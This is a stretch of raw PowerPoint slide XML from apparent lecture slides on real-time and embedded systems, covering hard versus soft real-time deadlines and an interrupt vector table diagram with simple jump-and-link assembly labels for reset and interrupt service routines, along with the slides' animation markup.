              <a:t>Reflects requirements to ensure a certain response time to certain events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compare:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Hard Real-Time System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> – failing to meet a deadline causes system failure, possibly extreme consequences (pacemaker, ABS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Soft Real-Time System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> – failing to meet a deadline may cause degraded service (streaming video)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4514021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3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="862013" y="1909763"/>
            <a:ext cx="2209800" cy="1981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1" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="862013" y="1452563"/>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IVT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4824413" y="1833563"/>
            <a:ext cx="1333500" cy="11430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3" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4595813" y="1376363"/>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MW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Startup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27654" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4824413" y="1785938"/>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_start:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394120" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5205413" y="2170113"/>
            <a:ext cx="0" cy="50165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56" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7224713" y="3084513"/>
            <a:ext cx="1333500" cy="1600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7" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6996113" y="2627313"/>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Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27658" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7224713" y="303688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main:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394124" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7491413" y="3433763"/>
            <a:ext cx="0" cy="91440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60" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="862013" y="1909763"/>
            <a:ext cx="2209800" cy="263525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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reset:    JAL _start</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394126" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2995613" y="1985963"/>
            <a:ext cx="1828800" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="7620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27" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5205413" y="2671763"/>
            <a:ext cx="2057400" cy="6096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63" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2690813" y="4729163"/>
            <a:ext cx="1333500" cy="1600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64" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2690813" y="41957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ISR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27665" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2690813" y="4681538"/>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int1_isr:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394131" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071813" y="5065713"/>
            <a:ext cx="0" cy="65405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67" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="862013" y="2138363"/>
            <a:ext cx="2209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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mem:	JAL mem_isr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>err:	JAL instr_isr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int1:	JAL int1_isr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int2:	JAL int2_isr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27668" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2690813" y="5672138"/>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J.f [ilink1]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27669" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="862013" y="2671763"/>
            <a:ext cx="2209800" cy="263525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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int1:     JAL int1_isr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394136" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="17886872" flipV="1">
            <a:off x="7529513" y="3852863"/>
            <a:ext cx="914400" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBolt">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF3300"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000" vert="eaVert" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394137" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2995613" y="2824163"/>
            <a:ext cx="4343400" cy="11430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38" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4214813" y="3541713"/>
            <a:ext cx="1600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pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Status flags saved into Status link register</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394139" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3833813" y="4043363"/>
            <a:ext cx="3581400" cy="19050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40" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5205413" y="5157788"/>
            <a:ext cx="190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pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Status flags reset to pre-interrupt settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ilink register written back to PC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394141" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="2824163"/>
            <a:ext cx="1219200" cy="21336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6" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="1931988"/>
            <a:ext cx="414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200" b="1">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2394134" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7196138" y="5414963"/>
            <a:ext cx="196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2400">
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>INTERRUPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4075505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4126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394126"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="239412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1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394127"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394127"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394127"/>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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="239412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394136"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394136"/>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2394134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394134"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394137"/>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2394138"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23941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2394141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2394131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
